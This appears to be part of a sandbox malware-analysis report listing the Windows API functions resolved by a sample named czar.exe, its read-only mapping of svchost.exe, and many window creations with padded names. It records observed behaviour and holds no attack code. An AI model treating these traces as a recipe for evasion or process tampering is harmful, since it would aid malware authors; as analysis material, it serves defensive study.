Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77e70fcb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77e69d35	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x75fe4a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75fe192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75fe170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75fe14e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75fe51b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x75fe3531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77e645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x75fe4d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x75fe14b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75fe1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75fe1725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x75fe3509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x75fe51e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x75fe51cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75fe4a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75fe5235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x7600772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x75fe87c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fe1916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x75fe49ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75fe11e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75fe14fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x75fe3587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75fe34b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77e522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77e52270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75fe14c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x75fe4493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75fe179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x7600d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75fe5189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x75fe495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x7600d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77e5e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77e71f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x75fe1946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77e63002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x75fe17b9	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetFocus, address_out = 0x76402175	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x763f9679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfW, address_out = 0x7641e061	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetForegroundWindow, address_out = 0x76402320	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x7644fd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x763f7d2f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x763f78e2	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x763f7809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x763f787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetForegroundWindow, address_out = 0x7641f170	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x77e625dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x763fb17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x763f8a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x763f9a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x76400dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = keybd_event, address_out = 0x764502bf	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x76403559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowTextW, address_out = 0x764020ec	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetWindowLongW, address_out = 0x763f6ffe	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetWindowLongW, address_out = 0x763f8332	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SystemParametersInfoW, address_out = 0x763f90d3	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetAncestor, address_out = 0x763f9785	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x760f0e0c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSidSubAuthority, address_out = 0x760f0e24	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x760f4304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x760f431c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76933c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76941e46	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = RtlUnwind, address_out = 0x77e76d39	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x71b0c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75fe4d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x7606410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x76064195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x75fed31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75ffee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x77e7441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x77e9c50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x77e9c381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75fff088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x77e805d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x77e9ca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77e50b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x77f0fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x77ea1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x76064761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x7605cd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x7606424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x760646b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x76076676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x76064751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x760765f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x760647c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x760647e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x760647f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75ffeee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsMenu, address_out = 0x76405cb1	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQueryInformationProcess, address_out = 0x77e4fac8	1	Fn
Create Mapping	C:\Windows\SysWOW64\svchost.exe	filename = C:\Windows\SysWOW64\svchost.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Windows\SysWOW64\svchost.exe	process_name = c:\users\5p5nrg~1\appdata\local\temp\czar.exe, desired_access = FILE_MAP_READ	1	Fn

Window (257)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	wndproc_parameter = 0	1	Fn
Create	-	class_name = ExtraWnd1, wndproc_parameter = 0	1	Fn
Create	-	class_name = ExtraWnd2, wndproc_parameter = 0	1	Fn
Create	-	class_name = #32768, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
